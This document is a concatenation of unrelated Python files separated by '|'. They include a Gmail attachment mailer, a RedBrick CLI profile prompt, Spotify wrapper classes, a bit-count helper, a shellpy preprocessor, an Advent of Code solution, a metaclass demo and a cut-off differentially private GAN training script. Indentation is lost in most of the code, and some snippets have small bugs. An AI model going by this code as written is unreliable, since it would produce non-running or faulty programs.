filelist = path
for file in filelist:
part = MIMEBase("application", "octet-stream")
part.set_payload(open(file, 'rb').read())
part.add_header( 'Content-Disposition',
'attachment; filename="%s"'% os.path.basename(file))
msg.attach(part)
# ATTACH PNG FILE ON MAIL
pnglist = glob.glob(save_path+'/'+eventname+'*.png')
for png in pnglist:
fp = open(png, 'rb')
img = MIMEImage(fp.read())
fp.close()
img.add_header('Content-Disposition', 'attachment', filename=os.path.basename(png))
msg.attach(img)
'''
#------------------------------------------------------------
# SEND MAIL
#------------------------------------------------------------
# ACCESS TO GMAIL
smtp_gmail = smtplib.SMTP_SSL('smtp.gmail.com', 465)
smtp_gmail.login(fromID, fromPW)
# smtp_gmail.sendmail(msg["From"], msg["To"].split(",") + msg["Cc"].split(","), msg.as_string())
smtp_gmail.sendmail(msg["From"], msg["To"].split(","), msg.as_string())
smtp_gmail.quit()
# comment = 'Send '+str(path)+'\nFrom\t'+fromID+'\nTo'; print(comment); print(toIDs)
print('SENDING E-MAIL COMPLETE.')
deltime = time.time() - starttime
print('\nDone.\t\t[{0} sec]'.format(round(deltime, 1)))
|
emptyForm = """
{"form": [
{
"type": "message",
"name": "note",
"description": "Connect to graphql"
},
{
"name": "url",
"description": "Graphql URL",
"type": "string",
"required": true
}
]}
"""
|
"""Input params handlers."""
from datetime import datetime
import re
from typing import List, Optional
from InquirerPy import inquirer # type: ignore
from redbrick.cli.cli_base import CLIInputParams
class CLIInputProfile(CLIInputParams):
"""Input profile handler."""
def __init__(
self,
entity: Optional[str],
profiles: List[str],
add: bool = False,
default: Optional[str] = None,
) -> None:
"""Init handlers."""
self.entity = entity
self.error_message = (
f"Non-alphanumeric / {'duplicate' if add else 'missing'} profile name"
)
self.add = add
self.profiles = profiles
self.default = default
def filtrator(self, entity: str) -> str:
"""Filter input entity."""
return entity.strip()
def validator(self, entity: str) -> bool:
"""Validate input entity."""
profile = self.filtrator(entity)
return (
profile.lower() != "default"
and re.match(r"^\w+$", profile) is not None
and (profile not in self.profiles if self.add else profile in self.profiles)
)
def get(self) -> str:
"""Get filtered profile value post validation."""
self.entity = self.from_args()
if self.entity is None:
if self.add:
self.entity = inquirer.text(
qmark=">",
amark=">",
message="Profile name:",
default="rb_" + datetime.strftime(datetime.now(), "%Y%m%d%H%M%S%f"),
transformer=self.filtrator,
filter=self.filtrator,
validate=self.validator,
invalid_message=self.error_message,
).execute()
elif self.profiles:
self.entity = inquirer.rawlist(
qmark=">",
amark=">",
message="Profile name:",
choices=self.profiles,
default=self.default,
).execute()
else:
raise ValueError("No profiles available")
return self.entity
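# Hedged sketch (added for illustration, not used by the CLI): the validation rules
# encoded in CLIInputProfile.validator, restated standalone so they can be checked
# without constructing the handler. The profile name "work" is made up.
def _is_valid_new_profile(name: str, existing: List[str]) -> bool:
    """Mirror of the add-mode rules: not 'default', word characters only, not a duplicate."""
    name = name.strip()
    return (
        name.lower() != "default"
        and re.match(r"^\w+$", name) is not None
        and name not in existing
    )
# _is_valid_new_profile("staging", ["work"])     -> True
# _is_valid_new_profile("work", ["work"])        -> False (duplicate)
# _is_valid_new_profile("my profile", ["work"])  -> False (whitespace rejected by ^\w+$)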
|
from __future__ import annotations
import datetime
import itertools
from tkinter import messagebox
from typing import List
import arkhesPlaylists
from spotifyWrapper import spotify_wrapper
class ArkhesResource:
def __init__(self, data_dict: dict) -> None:
self._data_dict = data_dict
self._line = ''
self._line_number = -1
self._rating = -1
def to_json(self) -> dict:
return self._data_dict
def line_to_write(self) -> str:
if self.rating() < 0:
return self.uri()
else:
return f'{self.uri()} {self.rating()}'
def line(self) -> str:
return self._line
def line_number(self) -> int:
return self._line_number
def set_line(self, line: str, line_number: int) -> None:
self._line = line
self._line_number = line_number
def rating(self) -> int:
return self._rating
def set_rating(self, rating: int) -> None:
self._rating = rating
def name(self) -> str:
return self._data_dict['name']
def spotify_id(self) -> str:
return self._data_dict['id']
def type(self) -> str:
return self._data_dict['type']
def uri(self) -> str:
return self._data_dict['uri']
def id(self) -> str:
return self._data_dict['id']
def contents(self) -> List[ArkhesResource]:
return []
def track_uris(self) -> List[str]:
return [[item.uri() for item in self.contents()]]
def release_date(self) -> str:
return self._data_dict.get('release_date', '0000-00-00')
def popularity(self) -> int:
return self._data_dict['popularity']
def description(self) -> str:
return '[No Description]'
def type_name(self) -> str:
return '[None]'
def save_unasked(self) -> None:
pass
def unsave_unasked(self) -> None:
pass
def save(self) -> bool:
		result = messagebox.askyesno('Save', f'Do you really want to add {self.name()} to your saved {self.type_name()}s on Spotify?')
if result:
self.save_unasked()
return result
def unsave(self) -> bool:
result = messagebox.askyesno('Delete', f'Do you really want to remove {self.name()} from your saved {self.type_name()}s on Spotify?')
if result:
self.unsave_unasked()
return result
def is_saved(self) -> bool:
return False
def toggle_saved(self) -> bool:
if self.is_saved():
return self.unsave()
else:
return self.save()
@staticmethod
def flatten(uris: list) -> list:
return list(itertools.chain.from_iterable(uris))
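# Hedged example (added): flatten() removes one level of nesting, e.g.
# ArkhesResource.flatten([["uri:a", "uri:b"], ["uri:c"]]) -> ["uri:a", "uri:b", "uri:c"];
# Artist and ArkhesPlaylist use it below to merge per-album track URI lists.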
class Album(ArkhesResource):
def contents(self) -> List[ArkhesResource]:
return [Song(item) for item in self._data_dict['tracks']['items']]
def number_of_tracks(self) -> int:
return self._data_dict['total_tracks']
def cover_url(self) -> str:
return self._data_dict['images'][0]['url']
def artist(self) -> Artist:
return Artist(self._data_dict['artists'][0]) #TODO: Handle multiple artists
def description(self) -> str:
return f'[Album]\n{self.name()}\nArtist: {self.artist().name()}\nRelease Date: {self.release_date()}'
def type_name(self) -> str:
return 'album'
def save_unasked(self) -> None:
spotify_wrapper.add_saved_album(self)
def unsave_unasked(self) -> None:
spotify_wrapper.remove_saved_album(self)
def is_saved(self) -> bool:
return spotify_wrapper.is_saved_album(self)
class SpotifyPlaylist(ArkhesResource):
def contents(self) -> List[ArkhesResource]:
return [Song(track['track']) for track in self._data_dict['tracks']['items']]
def type_name(self) -> str:
return 'spotify playlist'
def save_unasked(self) -> None:
spotify_wrapper.add_saved_playlist(self)
def unsave_unasked(self) -> None:
spotify_wrapper.remove_saved_playlist(self)
def is_saved(self) -> bool:
return spotify_wrapper.is_saved_playlist(self)
class Artist(ArkhesResource):
def contents(self) -> List[ArkhesResource]:
return [Album(item) for item in self._data_dict['albums']]
def track_uris(self) -> List[str]:
return ArkhesResource.flatten([resource.track_uris() for resource in self.contents()])
def description(self) -> str:
return f'[Artist]\n{self.name()}\nRelease Date: {self.release_date()}'
def type_name(self) -> str:
return 'artist'
def save_unasked(self) -> None:
spotify_wrapper.add_saved_artist(self)
def unsave_unasked(self) -> None:
spotify_wrapper.remove_saved_artist(self)
def is_saved(self) -> bool:
return spotify_wrapper.is_saved_artist(self)
class Song(ArkhesResource):
def contents(self) -> List[ArkhesResource]:
return [self]
def duration_ms(self) -> int:
return self._data_dict['duration_ms']
def duration(self) -> datetime.timedelta:
return datetime.timedelta(seconds=int(self.duration_ms()/1000))
def album(self) -> Album:
return Album(self._data_dict['album'])
def artist(self) -> Artist:
return Artist(self._data_dict['artists'][0]) #TODO: Handle multiple artists
def song(self) -> Song:
return self
def track_number(self) -> int:
return self._data_dict['track_number']
def type_name(self) -> str:
return 'song'
def save_unasked(self) -> None:
spotify_wrapper.add_saved_song(self)
def unsave_unasked(self) -> None:
spotify_wrapper.remove_saved_song(self)
def is_saved(self) -> bool:
return spotify_wrapper.is_saved_song(self)
class ArkhesPlaylist(ArkhesResource):
def contents(self) -> List[ArkhesResource]:
return arkhesPlaylists.ArkhesPlaylists.get_playlist_items(self._data_dict['name'])
def track_uris(self) -> List[str]:
return ArkhesResource.flatten([resource.track_uris() for resource in self.contents()])
class Playback(Song):
def __init__(self, data_dict: dict) -> None:
Song.__init__(self, data_dict['item'])
self._base_data_dict = data_dict
def is_none(self) -> bool:
return self._data_dict is None
def progress_ms(self) -> int:
return self._base_data_dict['progress_ms']
def progress(self) -> datetime.timedelta:
return datetime.timedelta(seconds=int(self.progress_ms()/1000))
def volume(self) -> int:
return self._base_data_dict['device']['volume_percent']
def context(self) -> ArkhesResource:
return self._base_data_dict['context']
|
# bit count library
# bitcount(val) returns number of set bits in val
# import the function bitcount()
__bctable__={}
__bctable__[0]=0
__bitmaskCacheBits__=16
#bitmaskCache=int("1"*8,2)
bitmaskCache=int("1"*__bitmaskCacheBits__,2)
#bitmaskCache=int("1"*32,2)
def __bitcountCache__(v0):
if v0 in __bctable__:
return __bctable__[v0]
c=0
# Recursive
# c=1+__bitcountCache__(v0 & (v0 - 1))
# Iterative
v=v0
while v:
  v &= v - 1
  c += 1
# MIT Bitcount
# uCount = v0 - ((v0 >> 1) & 033333333333) - ((v0 >> 2) & 011111111111);
# c = ((uCount + (uCount >> 3)) & 030707070707) % 63;
__bctable__[v0]=c
return c
def bitcount(v):
c=0
while v:
c += __bitcountCache__(v & bitmaskCache)
v = v >> __bitmaskCacheBits__
return c
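# Hedged self-check (added for illustration): compare bitcount() against Python's own
# popcount on a few arbitrary values; bin(v).count('1') is the reference.
if __name__ == '__main__':
    for _v in (0, 1, 0b1011, 2**40 - 1, 123456789):
        assert bitcount(_v) == bin(_v).count('1'), _v
    print('bitcount self-check passed')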
|
#!/usr/bin/env python
import os
import stat
import tempfile
import re
import getpass
import json
spy_file_pattern = re.compile(r'(.*)\.spy$')
shellpy_meta_pattern = re.compile(r'#shellpy-meta:(.*)')
shellpy_encoding_pattern = '#shellpy-encoding'
def preprocess_module(module_path):
"""The function compiles a module in shellpy to a python module, walking through all the shellpy files inside of
the module and compiling all of them to python
:param module_path: The path of module
:return: The path of processed module
"""
for item in os.walk(module_path):
path, dirs, files = item
for file in files:
if spy_file_pattern.match(file):
filepath = os.path.join(path, file)
preprocess_file(filepath, is_root_script=False)
return _translate_to_temp_path(module_path)
def preprocess_file(in_filepath, is_root_script, python_version=None):
"""Coverts a single shellpy file to python
:param in_filepath: The path of shellpy file to be processed
:param is_root_script: Shows whether the file being processed is a root file, which means the one
that user executed
:param python_version: version of python, needed to set correct header for root scripts
:return: The path of python file that was created of shellpy script
"""
new_filepath = spy_file_pattern.sub(r"\1.py", in_filepath)
out_filename = _translate_to_temp_path(new_filepath)
out_folder_path = os.path.dirname(out_filename)
if not is_root_script and not _is_compilation_needed(in_filepath, out_filename):
# TODO: cache root also
# TODO: if you don't compile but it's root, you need to change to exec
return out_filename
if not os.path.exists(out_folder_path):
os.makedirs(out_folder_path, mode=0o700)
header_data = _get_header(in_filepath, is_root_script, python_version)
with open(in_filepath, 'r') as f:
code = f.read()
out_file_data = _add_encoding_to_header(header_data, code)
intermediate = _preprocess_code_to_intermediate(code)
processed_code = _intermediate_to_final(intermediate)
out_file_data += processed_code
with open(out_filename, 'w') as f:
f.write(out_file_data)
in_file_stat = os.stat(in_filepath)
os.chmod(out_filename, in_file_stat.st_mode)
if is_root_script:
os.chmod(out_filename, in_file_stat.st_mode | stat.S_IEXEC)
return out_filename
def _get_username():
"""Returns the name of current user. The function is used in construction of the path for processed shellpy files on
temp file system
:return: The name of current user
"""
try:
n = getpass.getuser()
return n
except:
return 'no_username_found'
def _translate_to_temp_path(path):
"""Compiled shellpy files are stored on temp filesystem on path like this /{tmp}/{user}/{real_path_of_file_on_fs}
    Every user has their own copy of compiled shellpy files. Since they are stored somewhere other than
    where the source files actually are, we need a translation function that makes it easy to get the path
    of a compiled file
:param path: The path to be translated
:return: The translated path
"""
absolute_path = os.path.abspath(path)
relative_path = os.path.relpath(absolute_path, os.path.abspath(os.sep))
# TODO: this will not work in win where root is C:\ and absolute_in_path
# is on D:\
translated_path = os.path.join(tempfile.gettempdir(), 'shellpy_' + _get_username(), relative_path)
return translated_path
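# Hedged example (added): on a Linux machine with user "alice" and a /tmp tempdir,
# the translation above maps
#   /home/alice/project/script.spy -> /tmp/shellpy_alice/home/alice/project/script.spy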
def _is_compilation_needed(in_filepath, out_filepath):
"""Shows whether compilation of input file is required. It may be not required if the output file did not change
:param in_filepath: The path of shellpy file to be processed
:param out_filepath: The path of the processed python file. It may exist or not.
:return: True if compilation is needed, False otherwise
"""
if not os.path.exists(out_filepath):
return True
in_mtime = os.path.getmtime(in_filepath)
with open(out_filepath, 'r') as f:
for i in range(0, 3): # scan only for three first lines
line = f.readline()
line_result = shellpy_meta_pattern.search(line)
if line_result:
meta = line_result.group(1)
meta = json.loads(meta)
if str(in_mtime) == meta['mtime']:
return False
return True
def _get_header(filepath, is_root_script, python_version):
"""To execute converted shellpy file we need to add a header to it. The header contains needed imports and
required code
:param filepath: A shellpy file that is being converted. It is needed to get modification time of it and save it
to the created python file. Then this modification time will be used to find out whether recompilation is needed
:param is_root_script: Shows whether the file being processed is a root file, which means the one
that user executed
:param python_version: version of python, needed to set correct header for root scripts
:return: data of the header
"""
header_name = 'header_root.tpl' if is_root_script else 'header.tpl'
header_filename = os.path.join(os.path.dirname(__file__), header_name)
with open(header_filename, 'r') as f:
header_data = f.read()
mod_time = os.path.getmtime(filepath)
meta = {'mtime': str(mod_time)}
header_data = header_data.replace('{meta}', json.dumps(meta))
if is_root_script:
executables = {
2: '#!/usr/bin/env python',
3: '#!/usr/bin/env python3'
}
header_data = header_data.replace('#shellpy-python-executable', executables[python_version])
return header_data
def _preprocess_code_to_intermediate(code):
"""Before compiling to actual python code all expressions are converted to universal intermediate form
It is very convenient as it is possible to perform common operations for all expressions
The intemediate form looks like this:
longline_shexe(echo 1)shexe(p)shexe
:param code: code to convert to intermediate form
:return: converted code
"""
processed_code = _process_multilines(code)
processed_code = _process_long_lines(processed_code)
processed_code = _process_code_both(processed_code)
processed_code = _process_code_start(processed_code)
return _escape(processed_code)
def _process_multilines(script_data):
"""Converts a pyshell multiline expression to one line pyshell expression, each line of which is separated
by semicolon. An example would be:
f = `
echo 1 > test.txt
ls -l
`
:param script_data: the string of the whole script
:return: the shellpy script with multiline expressions converted to intermediate form
"""
code_multiline_pattern = re.compile(r'^([^`\n\r]*?)([a-z]*)`\s*?$[\n\r]{1,2}(.*?)`\s*?$', re.MULTILINE | re.DOTALL)
script_data = code_multiline_pattern.sub(r'\1multiline_shexe(\3)shexe(\2)shexe', script_data)
pattern = re.compile(r'multiline_shexe.*?shexe', re.DOTALL)
new_script_data = script_data
for match in pattern.finditer(script_data):
original_str = script_data[match.start():match.end()]
processed_str = re.sub(r'([\r\n]{1,2})', r'; \\\1', original_str)
new_script_data = new_script_data.replace(
original_str, processed_str)
return new_script_data
def _process_long_lines(script_data):
"""Converts to python a pyshell expression that takes more than one line. An example would be:
f = `echo The string \
on several \
lines
:param script_data: the string of the whole script
:return: the shellpy script converted to intermediate form
"""
code_long_line_pattern = re.compile(r'([a-z]*)`(((.*?\\\s*?$)[\n\r]{1,2})+(.*$))', re.MULTILINE)
new_script_data = code_long_line_pattern.sub(r'longline_shexe(\2)shexe(\1)shexe', script_data)
return new_script_data
def _process_code_both(script_data):
"""Converts to python a pyshell script that has ` symbol both in the beginning of expression and in the end.
An example would be:
f = `echo 1`
:param script_data: the string of the whole script
:return: the shellpy script converted to intermediate form
"""
code_both_pattern = re.compile(r'([a-z]*)`(.*?)`')
new_script_data = code_both_pattern.sub(r'both_shexe(\2)shexe(\1)shexe', script_data)
return new_script_data
def _process_code_start(script_data):
"""Converts to python a pyshell script that has ` symbol only in the beginning. An example would be:
f = `echo 1
:param script_data: the string of the whole script
:return: the shellpy script converted to intermediate form
"""
code_start_pattern = re.compile(r'^([^\n\r`]*?)([a-z]*)`([^`\n\r]+)$', re.MULTILINE)
new_script_data = code_start_pattern.sub(r'\1start_shexe(\3)shexe(\2)shexe', script_data)
return new_script_data
def _escape(script_data):
"""Escapes shell commands
:param script_data: the string of the whole script
:return: escaped script
"""
pattern = re.compile(r'[a-z]*_shexe.*?shexe', re.DOTALL)
new_script_data = script_data
for match in pattern.finditer(script_data):
original_str = script_data[match.start():match.end()]
if original_str.find('\'') != -1:
processed_str = original_str.replace('\'', '\\\'')
new_script_data = new_script_data.replace(
original_str, processed_str)
return new_script_data
def _intermediate_to_final(script_data):
"""All shell blocks are first compiled to intermediate form. This part of code converts the intermediate
to final python code
:param script_data: the string of the whole script
:return: python script ready to be executed
"""
intermediate_pattern = re.compile(r'[a-z]*_shexe\((.*?)\)shexe\((.*?)\)shexe', re.MULTILINE | re.DOTALL)
final_script = intermediate_pattern.sub(r"exe('\1'.format(**dict(locals(), **globals())),'\2')", script_data)
return final_script
def _add_encoding_to_header(header_data, script_data):
"""PEP-0263 defines a way to specify python file encoding. If this encoding is present in first
two lines of a shellpy script it will then be moved to the top generated output file
:param script_data: the string of the whole script
:return: the script with the encoding moved to top, if it's present
"""
encoding_pattern = re.compile(r'^(#[-*\s]*coding[:=]\s*([-\w.]+)[-*\s]*)$')
# we use \n here instead of os.linesep since \n is universal as it is present in all OSes
# when \r\n returned by os.linesep may not work if you run against unix files from win
first_two_lines = script_data.split('\n')[:2]
for line in first_two_lines:
encoding = encoding_pattern.search(line)
if encoding is not None:
break
if not encoding:
return header_data
else:
new_header_data = header_data.replace(shellpy_encoding_pattern, encoding.group(1))
return new_header_data
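# Hedged sketch (added for illustration, not part of the preprocessor): what the
# intermediate and final forms look like for a simple one-line expression.
if __name__ == '__main__':
    _demo = 'f = `echo 1`'
    _inter = _process_code_both(_demo)
    print(_inter)                          # f = both_shexe(echo 1)shexe()shexe
    print(_intermediate_to_final(_inter))  # f = exe('echo 1'.format(**dict(locals(), **globals())),'')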
|
import numpy as np
test_data = np.array([16, 1, 2, 0, 4, 2, 7, 1, 2, 14])
np_data = np.loadtxt("data.txt", delimiter=",", dtype=int)
def one(data: np.ndarray) -> int:
"""
Determine the horizontal position that the crabs can align to using the least fuel possible. How much fuel must they
spend to align to that position?
"""
median = np.median(data).astype(int)
return np.absolute(data - median).sum()
def two(data: np.ndarray) -> int:
"""
Determine the horizontal position that the crabs can align to using the least fuel possible so they can make you an
escape route! How much fuel must they spend to align to that position?
"""
mean = np.mean(data).astype(int)
diff = np.absolute(data - mean)
    # 'Factorial for addition' is the triangular number: moving X steps costs X*(X+1)/2 = (X^2 + X)/2 fuel
return ((diff * diff + diff) / 2).astype(int).sum()
print(f"1. {one(np_data)}")
print(f"2. {two(np_data)}")
|
class Meta(type):
def __init__(cls, name, bases, namespace):
super(Meta, cls).__init__(name, bases, namespace)
print("Creating new class: {}".format(cls))
def __call__(cls):
new_instance = super(Meta, cls).__call__()
print("Class {} new instance: {}".format(cls, new_instance))
return new_instance
class C(metaclass=Meta):
pass
c = C()
print(c)
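# Expected output (added note; the object address varies per run):
#   Creating new class: <class '__main__.C'>
#   Class <class '__main__.C'> new instance: <__main__.C object at 0x...>
#   <__main__.C object at 0x...>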
|
import os, sys
import numpy as np
import random
import copy
import torch
import torch.autograd as autograd
from torch.autograd import Variable
from torch.utils.data import DataLoader, Dataset, TensorDataset
import torchvision.transforms as transforms
import torchvision.datasets as datasets
from torch.utils.data.sampler import SubsetRandomSampler
from config import *
from models import *
from utils import *
from ops import exp_mov_avg
#from torchsummary import summary
from torchinfo import summary
from tqdm import tqdm
import pyvacy
#import torch.optim as optim
from pyvacy import optim, analysis, sampling
IMG_DIM = 768
NUM_CLASSES = 100
CLIP_BOUND = 1.
SENSITIVITY = 2.
DATA_ROOT = './../data'
iter_milestone = [1000, 5000, 10000, 20000]
acc_milestone = [i for i in range(10, 100, 10)]
acc_passed = [False for i in range(1, 10)]
##########################################################
### hook functions
##########################################################
def master_hook_adder(module, grad_input, grad_output):
'''
global hook
:param module:
:param grad_input:
:param grad_output:
:return:
'''
global dynamic_hook_function
return dynamic_hook_function(module, grad_input, grad_output)
def dummy_hook(module, grad_input, grad_output):
'''
dummy hook
:param module:
:param grad_input:
:param grad_output:
:return:
'''
pass
def modify_gradnorm_conv_hook(module, grad_input, grad_output):
'''
gradient modification hook
:param module:
:param grad_input:
:param grad_output:
:return:
'''
### get grad wrt. input (image)
grad_wrt_image = grad_input[0]
grad_input_shape = grad_wrt_image.size()
batchsize = grad_input_shape[0]
clip_bound_ = CLIP_BOUND / batchsize # account for the 'sum' operation in GP
grad_wrt_image = grad_wrt_image.view(batchsize, -1)
grad_input_norm = torch.norm(grad_wrt_image, p=2, dim=1)
### clip
clip_coef = clip_bound_ / (grad_input_norm + 1e-10)
clip_coef = clip_coef.unsqueeze(-1)
grad_wrt_image = clip_coef * grad_wrt_image
grad_input = (grad_wrt_image.view(grad_input_shape), grad_input[1], grad_input[2])
return tuple(grad_input)
def dp_conv_hook(module, grad_input, grad_output):
'''
gradient modification + noise hook
:param module:
:param grad_input:
:param grad_output:
:return:
'''
global noise_multiplier
### get grad wrt. input (image)
grad_wrt_image = grad_input[0]
grad_input_shape = grad_wrt_image.size()
batchsize = grad_input_shape[0]
clip_bound_ = CLIP_BOUND / batchsize
grad_wrt_image = grad_wrt_image.view(batchsize, -1)
grad_input_norm = torch.norm(grad_wrt_image, p=2, dim=1)
### clip
clip_coef = clip_bound_ / (grad_input_norm + 1e-10)
clip_coef = torch.min(clip_coef, torch.ones_like(clip_coef))
clip_coef = clip_coef.unsqueeze(-1)
grad_wrt_image = clip_coef * grad_wrt_image
### add noise
noise = clip_bound_ * noise_multiplier * SENSITIVITY * torch.randn_like(grad_wrt_image)
grad_wrt_image = grad_wrt_image + noise
grad_input_new = [grad_wrt_image.view(grad_input_shape)]
for i in range(len(grad_input)-1):
grad_input_new.append(grad_input[i+1])
return tuple(grad_input_new)
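# Hedged sketch (added for illustration, never called by the training code): the
# clip-and-noise arithmetic used by dp_conv_hook above, applied to a dummy gradient
# tensor. The batch size and the noise multiplier (1.0) are illustrative values only.
def _dp_clip_and_noise_demo():
	g = torch.randn(8, 32)                       # pretend gradient w.r.t. a batch of 8 inputs
	clip_bound_ = CLIP_BOUND / g.shape[0]        # per-batch bound, as in the hook
	flat = g.view(g.shape[0], -1)
	clip_coef = torch.clamp(clip_bound_ / (flat.norm(p=2, dim=1) + 1e-10), max=1.)
	clipped = clip_coef.unsqueeze(-1) * flat
	noised = clipped + clip_bound_ * 1.0 * SENSITIVITY * torch.randn_like(clipped)
	return noised.view_as(g)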
class Flatten(nn.Module):
def forward(self, input):
return input.view(input.size()[0], -1)
class Classifier(nn.Module):
def __init__(self):
super(Classifier, self).__init__()
#input [1, 28, 28]
self.model = nn.Sequential(
Flatten(),
nn.Linear(784, 128),
nn.ReLU(),
nn.Dropout(0.5),
nn.Linear(128, 10),
)
def forward(self, input):
return self.model(input)
FloatTensor = torch.cuda.FloatTensor
LongTensor = torch.cuda.LongTensor
def classify_training(netGS, dataset, iter):
### Data loaders
if dataset == 'mnist' or dataset == 'fashionmnist':
transform_train = transforms.Compose([
transforms.CenterCrop((28, 28)),
transforms.ToTensor(),
#transforms.Grayscale(),
])
elif dataset == 'cifar_100' or dataset == 'cifar_10':
transform_train = transforms.Compose([
transforms.CenterCrop((28, 28)),
transforms.Grayscale(),
transforms.ToTensor(),
])
if dataset == 'mnist':
dataloader = datasets.MNIST
test_set = dataloader(root=os.path.join(DATA_ROOT, 'MNIST'), train=False, download=True,
transform=transform_train)
IMG_DIM = 784
NUM_CLASSES = 10
elif dataset == 'fashionmnist':
dataloader = datasets.FashionMNIST
test_set = dataloader(root=os.path.join(DATA_ROOT, 'FashionMNIST'), train=False, download=True,
transform=transform_train)
elif dataset == 'cifar_100':
dataloader = datasets.CIFAR100
test_set = dataloader(root=os.path.join(DATA_ROOT, 'CIFAR100'), train=False, download=True,
transform=transform_train)
IMG_DIM = 3072
NUM_CLASSES = 100
elif dataset == 'cifar_10':
IMG_DIM = 784
NUM_CLASSES = 10
dataloader = datasets.CIFAR10
test_set = dataloader(root=os.path.join(DATA_ROOT, 'CIFAR10'), train=False, download=True,
transform=transform_train)
else:
raise NotImplementedError
test_loader = DataLoader(test_set, batch_size=1000, shuffle=False)
netGS.eval()
for i in tqdm(range(25)):
gen_labels = Variable(LongTensor(np.random.randint(0, 10, 2000)))
noise = Variable(FloatTensor(np.random.normal(0, 1, (2000, args.z_dim))))
synthesized = netGS(noise, gen_labels)
if (i == 0):
new_data = synthesized.cpu().detach()
new_label = gen_labels.cpu().detach()
else:
new_data = torch.cat((new_data, synthesized.cpu().detach()), 0)
new_label = torch.cat((new_label, gen_labels.cpu().detach()), 0)
new_data = torch.clamp(new_data, min=0., max=1.)
C = Classifier().cuda()
C.train()
opt_C = torch.optim.Adam(C.parameters(), lr=1e-3)
criterion = nn.CrossEntropyLoss()
gen_set = TensorDataset(new_data.cuda(), new_label.cuda())
gen_loader = DataLoader(gen_set, batch_size=32, shuffle=True)
prg_bar = tqdm(range(50))
for epoch in prg_bar:
train_acc = 0.0
train_loss = 0.0
for i, (data, label) in enumerate(gen_loader):
pred = C(data)
loss = criterion(pred, label)
opt_C.zero_grad()
loss.backward()
opt_C.step()
train_acc += np.sum(np.argmax(pred.cpu().data.numpy(), axis=1) == label.cpu().numpy())
train_loss += loss.item()
prg_bar.set_description(f'acc: {train_acc/gen_set.__len__():.3f} loss: {train_loss/gen_set.__len__():.4f}')
test_acc = 0.0
C.eval()
for i, (data, label) in enumerate(test_loader):
data = Variable(data.type(FloatTensor))
label = Variable(label.type(LongTensor))
pred = C(data)
test_acc += np.sum(np.argmax(pred.cpu().data.numpy(), axis=1) == label.cpu().numpy())
test_acc /= test_set.__len__()
test_acc *= 100
print(f'the final result of test accuracy = {test_acc/100:.3f}')
for i in range(9):
if (test_acc > acc_milestone[i] and acc_passed[i] == False):
acc_passed[i] = True
torch.save(netGS, os.path.join(args.checkpoint, f'diff_acc/{acc_milestone[i]}.pth'))
with open(os.path.join(args.checkpoint, f'diff_acc/result.txt'), 'a') as f:
f.write(f"thres:{acc_milestone[i]}% iter:{iter}, acc:{test_acc:.1f}%\n")
if (iter in iter_milestone):
torch.save(netGS, os.path.join(args.checkpoint, f'diff_iter/{iter}.pth'))
with open(os.path.join(args.checkpoint, f'diff_iter/result.txt'), 'a') as f:
f.write(f"iter:{iter}, acc:{test_acc:.1f}%\n")
del C, new_data, new_label, gen_set, gen_loader
torch.cuda.empty_cache()
def add_noise(net):
with torch.no_grad():
for p_net in net.parameters():
grad_input_shape = p_net.grad.shape
batchsize = grad_input_shape[0]
clip_bound_ = CLIP_BOUND / batchsize
grad_wrt_image = p_net.grad.view(batchsize, -1)
grad_input_norm = torch.norm(grad_wrt_image, p=2, dim=1)
### clip
clip_coef = clip_bound_ / (grad_input_norm + 1e-10)
clip_coef = torch.min(clip_coef, torch.ones_like(clip_coef))
clip_coef = clip_coef.unsqueeze(-1)
grad_wrt_image = clip_coef * grad_wrt_image
### add noise
global noise_multiplier
noise = clip_bound_ * noise_multiplier * SENSITIVITY * torch.randn_like(grad_wrt_image)
grad_wrt_image = grad_wrt_image + noise
grad_input_new = grad_wrt_image.view(grad_input_shape)
			p_net.grad = grad_input_new  # write back the clipped, noised gradient (rebinding the loop variable had no effect)
return net
##########################################################
### main
##########################################################
def main(args):
### config
global noise_multiplier
dataset = args.dataset
num_discriminators = args.num_discriminators
noise_multiplier = args.noise_multiplier
z_dim = args.z_dim
model_dim = args.model_dim
batchsize = args.batchsize
L_gp = args.L_gp
L_epsilon = args.L_epsilon
critic_iters = args.critic_iters
latent_type = args.latent_type
load_dir = args.load_dir
save_dir = args.save_dir
if_dp = (args.dp > 0.)
gen_arch = args.gen_arch
num_gpus = args.num_gpus
### CUDA
use_cuda = torch.cuda.is_available()
devices = [torch.device("cuda:%d" % i if use_cuda else "cpu") for i in range(num_gpus)]
device0 = devices[0]
if use_cuda:
torch.set_default_tensor_type('torch.cuda.FloatTensor')
### Random seed
random.seed(args.random_seed)
np.random.seed(args.random_seed)
torch.manual_seed(args.random_seed)
### Fix noise for visualization
if latent_type == 'normal':
fix_noise = torch.randn(10, z_dim)
elif latent_type == 'bernoulli':
p = 0.5
bernoulli = torch.distributions.Bernoulli(torch.tensor([p]))
fix_noise = bernoulli.sample((10, z_dim)).view(10, z_dim)
else:
raise NotImplementedError
### Set up models
print('gen_arch:' + gen_arch)
netG = GeneratorDCGAN(z_dim=z_dim, model_dim=model_dim, num_classes=10)
netGS = copy.deepcopy(netG)
netD_list = []
for i in range(num_discriminators):
netD = DiscriminatorDCGAN()
netD_list.append(netD)
### Load pre-trained discriminators
print("load pre-training...")
if load_dir is not None:
for netD_id in range(num_discriminators):
print('Load NetD ', str(netD_id))
network_path = os.path.join(load_dir, 'netD_%d' % netD_id, 'netD.pth')
netD = netD_list[netD_id]
netD.load_state_dict(torch.load(network_path))
netG = netG.to(device0)
for netD_id, netD in enumerate(netD_list):
device = devices[get_device_id(netD_id, num_discriminators, num_gpus)]
netD.to(device)
### Set up optimizers
optimizerD_list = []
for i in range(num_discriminators):
netD = netD_list[i]
opt_D = pyvacy.optim.DPAdam(
l2_norm_clip = 1.0,
noise_multiplier = noise_multiplier,
minibatch_size = args.batchsize,
microbatch_size = 1,
params = netD.parameters(),
lr = 1e-4,
betas = (0.5, 0.999),
)
#optimizerD = optim.Adam(netD.parameters(), lr=1e-4, betas=(0.5, 0.99))
optimizerD_list.append(opt_D)
optimizerG = optim.Adam(netG.parameters(), lr=1e-4, betas=(0.5, 0.99))
### Data loaders
if dataset == 'mnist' or dataset == 'fashionmnist':
transform_train = transforms.Compose([
transforms.CenterCrop((28, 28)),
transforms.ToTensor(),
#transforms.Grayscale(),
])
elif dataset == 'cifar_100' or dataset == 'cifar_10':
transform_train = transforms.Compose([
transforms.CenterCrop((28, 28)),
transforms.Grayscale(),
transforms.ToTensor(),
])
if dataset == 'mnist':
dataloader = datasets.MNIST
trainset = dataloader(root=os.path.join(DATA_ROOT, 'MNIST'), train=True, download=True,
transform=transform_train)
IMG_DIM = 784
NUM_CLASSES = 10
